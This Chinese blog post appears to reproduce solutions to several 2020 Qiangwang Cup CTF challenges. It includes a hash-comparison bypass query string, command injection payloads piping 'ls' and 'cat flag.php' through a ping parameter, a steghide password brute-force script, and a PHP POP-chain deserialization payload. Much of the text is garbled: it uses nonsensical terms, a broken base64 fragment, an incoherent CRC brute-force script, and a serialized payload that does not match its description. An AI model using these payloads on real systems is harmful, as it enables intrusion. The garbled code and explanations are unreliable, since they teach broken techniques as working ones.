博客
关于我
2020强网杯部分题目复现
阅读量:688 次
发布时间:2019-03-17

本文共 2146 字,大约阅读时间需要 7 分钟。

强网先锋

Funhash

为绕过第一关,我们需要找到一个特殊字符串,该字符串在MD4加密后仍与自身相等。这类特殊字符串被称为密闭映射(Funny Hash的前缀)。常规方法如暴破较为缓慢,因此我放弃了这一选择。在网上搜索(并将搜索引擎语言设置为汉卡),发现相关知识点。最终发现了这个特殊字符串:0e251288019

将该字符串作为hash1提交即可绕过第一关,随后其他两个关卡也相对简单。

绕过方法:

?hash1=0e251288019&hash2[]=2&hash3[]=3&hash4=ffifdyop

主动

关卡考察对象是命令执行 vulnerability。通过提交IP参数 bypass.FLAG check后,利用ping命令获取远程设备信息.

绕过方法:

?ip=127.0.0.1|ls

由于空格被过滤,通过%20替换空格提交:

?ip=127.0.0.1|cat%20flag.php

访问preg_match函数后,发现flag.php源码中包含flag信息。


upload

分析题目附件中的数据包,使用Wireshark分析HTTP请求对象,导出相关文件。flag.php文件中的表单提交动作指向steghide.php。flag的位置在注释中,可以通过判断密码质量进行分析。

解题方法:

  • 找到注释中的好密码。
  • 使用steghide工具解题,推荐使用脚本进行自动化破解:
  • #!/bin/bashfor line in `cat $2`;do    steghide extract -sf $1 -p $line > /dev/null 2>&1    if [[ $? -eq 0 ]];then        echo 'password is: '$line        exit    fidone

    web辅助

    这类题目考察pop链 vulnerable。通过分析类方法__construct, __toString等,实现对flag的获取。

    构造pop的链路:

  • topsolo类实例化时触发__construct,返回midsolo对象。
  • midsolo对象触发__construct,返回jungle对象。
  • jungle对象的__toString方法执行cat /flag,从而获取flag。
  • payload示例:

    $lol = new topsolo();print_r(serialize($lol));

    输出结果为:

    O:7:"topsolo":1:{    s:7:"%00*%00name";    O:7:"midsolo":1:{        s:7:"%00*%00name";        O:6:"jungle":1:{            s:7:"%00*%00name";            s:7:"Lee Sin";        }    }}

    计算机

    套娃题,第一关通过查看请求路径找到/fonts/1,下载相关字体文件,提取其中的base64字符串。

    解题方法:

  • 复制base64字符串:
  • i = 'AIzaTransit`base64_decode(i)
    1. 使用工具解密,获取flag。

    2. CRC爆破

      最后关卡是一个CRC绕过问题。通过逐次暴破循环校验和,找到原始明文。

      脚本示例:

      import binasciidef find_crc():    # binary string length    len_sequences = 0x10000    # CRC-32 dictionary    dict = string.printable    # example: crc1 = 0x9aeacc13, crc2 = 0xeed7e184, crc3 = 0x289585af    if not find:        returnprint("Successfully found CRC值:", found_password)def CrackCrc5(crc):    for i in dict:        for j in dict:            for p in dict:                for q in dict:                    for h in dict:                        s = i + j + p + q + h                        if crc == binascii.crc32(s.encode("ascii")):                            print(s)                            return CrackCrc5(crc1) CrackCrc4(crc2) CrackCrc5(crc3)

      总结

      此次比赛让我学到了许多新知识,尤其是pop链和隐写技术的处理。此外,通过多个bucket工具的学习,进一步加深了对安全领域的理解。未来将继续积累相关经验,争取在接下来的比赛中取得更好的成绩!

    转载地址:http://dtshz.baihongyu.com/

    你可能感兴趣的文章
    nacos源码 nacos注册中心1.4.x 源码 nacos源码如何下载 nacos 客户端源码下载地址 nacos discovery下载地址(一)
    查看>>
    nacos源码 nacos注册中心1.4.x 源码 spring cloud alibaba 的discovery做了什么 nacos客户端是如何启动的(二)
    查看>>
    nacos源码 nacos注册中心1.4.x 源码 如何注册服务 发送请求,nacos clinet客户端心跳 nacos 注册中心客户端如何发送的心跳 (三)
    查看>>
    Nacos源码分析:心跳机制、健康检查、服务发现、AP集群
    查看>>
    nacos看这一篇文章就够了
    查看>>
    Nacos简介、下载与配置持久化到Mysql
    查看>>
    Nacos简介和控制台服务安装
    查看>>
    Nacos管理界面详细介绍
    查看>>
    Nacos编译报错NacosException: endpoint is blank
    查看>>
    nacos自动刷新配置
    查看>>
    nacos运行报错问题之一
    查看>>
    Nacos部署中的一些常见问题汇总
    查看>>
    NACOS部署,微服务框架之NACOS-单机、集群方式部署
    查看>>
    Nacos配置Mysql数据库
    查看>>
    Nacos配置中心中配置文件的创建、微服务读取nacos配置中心
    查看>>
    Nacos配置中心集群原理及源码分析
    查看>>
    nacos配置在代码中如何引用
    查看>>
    nacos配置新增不成功
    查看>>
    nacos配置自动刷新源码解析
    查看>>
    nacos集成分布式事务插件Seata的序列化问题,实际上是Seata本身存在bug!!
    查看>>